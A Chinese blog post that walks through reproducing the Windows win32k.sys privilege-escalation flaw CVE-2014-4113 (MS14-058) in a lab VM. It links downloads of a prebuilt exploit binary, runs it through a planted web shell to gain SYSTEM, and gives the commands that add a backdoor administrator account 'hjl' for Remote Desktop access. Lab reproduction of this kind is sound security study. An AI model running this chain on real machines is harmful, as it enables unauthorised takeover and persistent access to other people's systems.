1.漏洞描述
Microsoft Windows下的 win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它包含有窗口管理器、后者控制窗口显示和管理屏幕输出等。如果Windows内核模式驱动程序不正确地处理内存中的对象,则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代
码。攻击者随后可安装程序;查看、更改或删除数据;或者创建拥有完全管理权限的新帐户。
2.影响版本
该漏洞影响所有Windows x64,包括Windows 7 和 Windows Server 2008 R2 及以下版本。
3.漏洞复现
首先我们准备实验环境 我们的 Windows Server 2008 R2版本
我已经上传到百度网盘
通过网盘分享的文件:08serverR2-1.zip
链接: 百度网盘 请输入提取码 提取码: 7hyh
--来自百度网盘超级会员v3的分享
通过网盘分享的文件:CVE-2014-4113 (MS14-058)
链接: 百度网盘 请输入提取码 提取码: ev8a
--来自百度网盘超级会员v3的分享
大家需要的请下载
解压安装即可
我们首先查看ip 输入 ipconfig
ip 是192.168.25.139
点开目录下 有.asp .aspx 文件
我们在浏览器输入
输入密码 123456
首先我们先看他能不能执行cmd命令
发现可以执行
如果不能执行的话
然后我们找到这个目录下的 cmd.exe文件
我们复制路径
C:\Windows\debug\WIA\Cmd.exe
然后我们回到执行cmd命令的窗口
原来的目录
然后我们修改为
我们点击执行
发现也是可以执行的
然后我们找到别人弄好的 exp
然后点击下载就好了
你们也可以下载我自己的exp
通过网盘分享的文件:CVE-2014-4113-Exploit.rar
链接: 百度网盘 请输入提取码 提取码: 3h8n
--来自百度网盘超级会员v3的分享
然后我们使用Win64.exe
我们还是找到刚才的目录
C:\Windows\debug\WIA\win64.exe
这个Win64.exe 就是我们上传上去的
然后我们继续切换到cmd目录
然后输入
C:\Windows\debug\WIA\win64.exe whoami
我们点击执行没反应
然后我们把cmd的路径在切换到原来的
然后我们就用系统的cmd.exe
回复成为原来的 然后我们再次点击执行
就发现执行成功了 是系统权限
同样的我们输入
输入登陆密码 admin
然后找到 cmdshell
我们输入
C:\Windows\debug\WIA\win64.exe whoami
同样也是系统权限
同样的我们进行查看端口开放权限
我们发现开启了3389端口 那摩我们就可以使用远程桌面
我们在我们的本机输入
双击打开
输入192.168.125.139
连续点击连接
然后我们需要输入用户名 密码
我们虽然知道 开机的密码 也就是Administrators 的密码 但是在实战中我们是不知道 所以我们要拿刚才的system权限来创建一个新用户 来供我们来连接
首先我们在原来的端口输入】
net user 查看当前哦用户
然后我们输入
/c C:\Windows\debug\WIA\win64.exe "net user hjl 123456 /add"
点击执行
命令执行成功
然后我们输入
/c C:\Windows\debug\WIA\win64.exe "net user"
我们查看我们的用户有没有 添加进去
我们发现已经添加进去了
然后我们再进行登录
我们点击确定
点击是
然后我们发先 弹出了这个错误
发现登录不了
然后在网上搜索我们发现
所以我们在输入指令 把这个hjl 我们提升到管理员权限组
我们首先先查询 管理员组用户
我们输入
/c C:\Windows\debug\WIA\win64.exe "net localgroup administrators"
然后我们再把hjl添加到管理员组用户
我们输入
/c C:\Windows\debug\WIA\win64.exe "net localgroup administrators hjl /add
我们在查询管理员组用户
我们在输入
/c C:\Windows\debug\WIA\win64.exe "net localgroup administrators "
发现里边多了hjl这个用户 所以我们算是成功了
然后我们在登录远程桌面
这下我们就成功登陆了
然后我们打开cmd窗口
输入 whoami
这下我们就复现完成了
扫一扫
846
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
